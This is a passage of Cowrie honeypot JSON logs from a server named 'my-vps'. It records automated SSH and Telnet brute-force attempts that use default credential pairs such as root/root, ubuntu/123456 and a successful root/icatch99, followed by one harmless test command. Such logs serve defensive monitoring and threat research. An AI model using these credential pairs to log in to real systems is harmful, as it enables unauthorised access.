],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:22.005876Z","src_ip":"45.125.211.194","session":"f4b6209b9ca2"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:22.847000Z","src_ip":"45.125.211.194","session":"f4b6209b9ca2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:24.059188Z","src_ip":"45.125.211.194","session":"f4b6209b9ca2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52456,"dst_ip":"1.2.3.4","dst_port":23,"session":"716114a3b768","protocol":"telnet","message":"New connection: 212.227.235.229:52456 (1.2.3.4:23) [session: 716114a3b768]","sensor":"my-vps","timestamp":"2025-08-28T03:30:25.535528Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:27.454787Z","src_ip":"212.227.235.229","session":"716114a3b768"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40746,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b144c196241","protocol":"ssh","message":"New connection: 212.227.125.160:40746 (1.2.3.4:22) [session: 8b144c196241]","sensor":"my-vps","timestamp":"2025-08-28T03:30:30.428000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:30.429024Z","src_ip":"212.227.125.160","session":"8b144c196241"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:30.653421Z","src_ip":"212.227.125.160","session":"8b144c196241"}
{"eventid":"cowrie.session.closed","duration":5.301785707473755,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:30.837248Z","src_ip":"212.227.235.229","session":"716114a3b768"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52472,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0f90d727a9b","protocol":"telnet","message":"New connection: 212.227.235.229:52472 (1.2.3.4:23) [session: d0f90d727a9b]","sensor":"my-vps","timestamp":"2025-08-28T03:30:30.924823Z"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:31.329093Z","src_ip":"212.227.125.160","session":"8b144c196241"}
{"eventid":"cowrie.session.closed","duration":1.349407434463501,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:32.274123Z","src_ip":"212.227.235.229","session":"d0f90d727a9b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:32.554903Z","src_ip":"212.227.125.160","session":"8b144c196241"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52474,"dst_ip":"1.2.3.4","dst_port":23,"session":"e22963dfa59e","protocol":"telnet","message":"New connection: 212.227.235.229:52474 (1.2.3.4:23) [session: e22963dfa59e]","sensor":"my-vps","timestamp":"2025-08-28T03:30:33.887251Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:30:34.129105Z","src_ip":"212.227.235.229","session":"e22963dfa59e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:30:34.217248Z","src_ip":"212.227.235.229","session":"e22963dfa59e"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T03:30:34.352919Z","src_ip":"212.227.235.229","session":"e22963dfa59e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:35.385077Z","src_ip":"212.227.235.229","session":"e22963dfa59e"}
{"eventid":"cowrie.session.closed","duration":1.5028815269470215,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:35.390044Z","src_ip":"212.227.235.229","session":"e22963dfa59e"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":50942,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c46adaa27c1","protocol":"ssh","message":"New connection: 194.233.79.134:50942 (1.2.3.4:22) [session: 1c46adaa27c1]","sensor":"my-vps","timestamp":"2025-08-28T03:30:36.537619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:36.547642Z","src_ip":"194.233.79.134","session":"1c46adaa27c1"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":17208,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f1527a6b48b","protocol":"ssh","message":"New connection: 45.125.211.194:17208 (1.2.3.4:22) [session: 7f1527a6b48b]","sensor":"my-vps","timestamp":"2025-08-28T03:30:36.661097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:36.683192Z","src_ip":"45.125.211.194","session":"7f1527a6b48b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:37.326894Z","src_ip":"45.125.211.194","session":"7f1527a6b48b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:37.355110Z","src_ip":"194.233.79.134","session":"1c46adaa27c1"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:37.992856Z","src_ip":"45.125.211.194","session":"7f1527a6b48b"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:38.439973Z","src_ip":"194.233.79.134","session":"1c46adaa27c1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:39.216359Z","src_ip":"45.125.211.194","session":"7f1527a6b48b"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:39.752192Z","src_ip":"194.233.79.134","session":"1c46adaa27c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33392,"dst_ip":"1.2.3.4","dst_port":22,"session":"54a214311154","protocol":"ssh","message":"New connection: 212.227.125.160:33392 (1.2.3.4:22) [session: 54a214311154]","sensor":"my-vps","timestamp":"2025-08-28T03:30:42.357085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:42.357857Z","src_ip":"212.227.125.160","session":"54a214311154"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:42.577522Z","src_ip":"212.227.125.160","session":"54a214311154"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:43.502090Z","src_ip":"212.227.125.160","session":"54a214311154"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:44.724776Z","src_ip":"212.227.125.160","session":"54a214311154"}
{"eventid":"cowrie.session.connect","src_ip":"195.178.110.224","src_port":45418,"dst_ip":"1.2.3.4","dst_port":22,"session":"86de940052a7","protocol":"ssh","message":"New connection: 195.178.110.224:45418 (1.2.3.4:22) [session: 86de940052a7]","sensor":"my-vps","timestamp":"2025-08-28T03:30:51.452220Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":60262,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebb661a077f6","protocol":"ssh","message":"New connection: 45.125.211.194:60262 (1.2.3.4:22) [session: ebb661a077f6]","sensor":"my-vps","timestamp":"2025-08-28T03:30:51.460745Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:51.475396Z","src_ip":"195.178.110.224","session":"86de940052a7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:51.476710Z","src_ip":"45.125.211.194","session":"ebb661a077f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:30:51.673524Z","src_ip":"45.125.211.194","session":"ebb661a077f6"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-28T03:30:52.509256Z","src_ip":"45.125.211.194","session":"ebb661a077f6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:30:53.722203Z","src_ip":"45.125.211.194","session":"ebb661a077f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36476,"dst_ip":"1.2.3.4","dst_port":22,"session":"88b9dc838351","protocol":"ssh","message":"New connection: 212.227.125.160:36476 (1.2.3.4:22) [session: 88b9dc838351]","sensor":"my-vps","timestamp":"2025-08-28T03:30:59.885399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:30:59.886073Z","src_ip":"212.227.125.160","session":"88b9dc838351"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:00.105807Z","src_ip":"212.227.125.160","session":"88b9dc838351"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:00.768664Z","src_ip":"212.227.125.160","session":"88b9dc838351"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:01.992893Z","src_ip":"212.227.125.160","session":"88b9dc838351"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":39032,"dst_ip":"1.2.3.4","dst_port":22,"session":"700548b87f38","protocol":"ssh","message":"New connection: 45.125.211.194:39032 (1.2.3.4:22) [session: 700548b87f38]","sensor":"my-vps","timestamp":"2025-08-28T03:31:06.366084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:06.382120Z","src_ip":"45.125.211.194","session":"700548b87f38"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:06.582256Z","src_ip":"45.125.211.194","session":"700548b87f38"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:07.407608Z","src_ip":"45.125.211.194","session":"700548b87f38"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:08.618141Z","src_ip":"45.125.211.194","session":"700548b87f38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57356,"dst_ip":"1.2.3.4","dst_port":22,"session":"141e85641ad3","protocol":"ssh","message":"New connection: 212.227.125.160:57356 (1.2.3.4:22) [session: 141e85641ad3]","sensor":"my-vps","timestamp":"2025-08-28T03:31:11.612580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:11.613249Z","src_ip":"212.227.125.160","session":"141e85641ad3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:11.832522Z","src_ip":"212.227.125.160","session":"141e85641ad3"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:12.492778Z","src_ip":"212.227.125.160","session":"141e85641ad3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:13.714272Z","src_ip":"212.227.125.160","session":"141e85641ad3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40008,"dst_ip":"1.2.3.4","dst_port":22,"session":"563055b194dd","protocol":"ssh","message":"New connection: 212.227.235.229:40008 (1.2.3.4:22) [session: 563055b194dd]","sensor":"my-vps","timestamp":"2025-08-28T03:31:14.416359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:14.417903Z","src_ip":"212.227.235.229","session":"563055b194dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v0